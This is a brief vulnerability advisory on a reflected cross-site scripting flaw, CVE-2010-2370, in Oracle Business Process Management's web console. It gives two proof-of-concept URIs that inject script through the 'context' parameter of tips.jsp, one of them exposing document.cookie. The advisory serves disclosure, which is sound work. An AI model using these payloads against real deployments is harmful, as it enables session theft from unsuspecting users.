Oracle Business Process Management CVE-2010-2370 Cross Site Scripting Vulnerability

Oracle Business Process Management CVE-2010-2370 Cross Site Scripting Vulnerability

Attackers can exploit the issue by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script>